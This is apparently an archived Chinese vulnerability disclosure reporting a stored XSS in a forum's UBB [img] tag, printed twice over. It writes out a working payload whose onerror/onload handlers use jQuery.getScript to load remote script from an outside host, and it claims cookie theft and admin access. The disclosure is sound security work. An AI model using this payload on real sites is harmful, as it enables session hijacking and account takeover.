VULHUB ™

### 简要描述： 可以在小洞上自由发辉成大洞 XSS小洞一个 ### 详细说明： 讨论区发布话题对UBBcode未过滤完全 ``` [img]e2.jpg"onerror="jQuery.getScript('http://1.tengzhou8.sinaapp.com/tp.js')" onload="jQuery.getScript('http://1.tengzhou8.sinaapp.com/tp.js')[/img] ``` 危害:现在我只是小小的利用了一下赞和收藏功能,可模仿用户进行任意操作,盗COOKIE,登后台,危害较大 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201309/262326104789e7455c90f7a08deb55aa657d2ac6.jpg" alt="3.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/262326104789e7455c90f7a08deb55aa657d2ac6.jpg) [<img src="https://images.seebug.org/upload/201309/26232543aabded67fb12f6959db552dd3d3dc586.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/26232543aabded67fb12f6959db552dd3d3dc586.jpg)

### 简要描述： 可以在小洞上自由发辉成大洞 XSS小洞一个 ### 详细说明： 讨论区发布话题对UBBcode未过滤完全 ``` [img]e2.jpg"onerror="jQuery.getScript('http://1.tengzhou8.sinaapp.com/tp.js')" onload="jQuery.getScript('http://1.tengzhou8.sinaapp.com/tp.js')[/img] ``` 危害:现在我只是小小的利用了一下赞和收藏功能,可模仿用户进行任意操作,盗COOKIE,登后台,危害较大 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201309/262326104789e7455c90f7a08deb55aa657d2ac6.jpg" alt="3.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/262326104789e7455c90f7a08deb55aa657d2ac6.jpg) [<img src="https://images.seebug.org/upload/201309/26232543aabded67fb12f6959db552dd3d3dc586.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/26232543aabded67fb12f6959db552dd3d3dc586.jpg)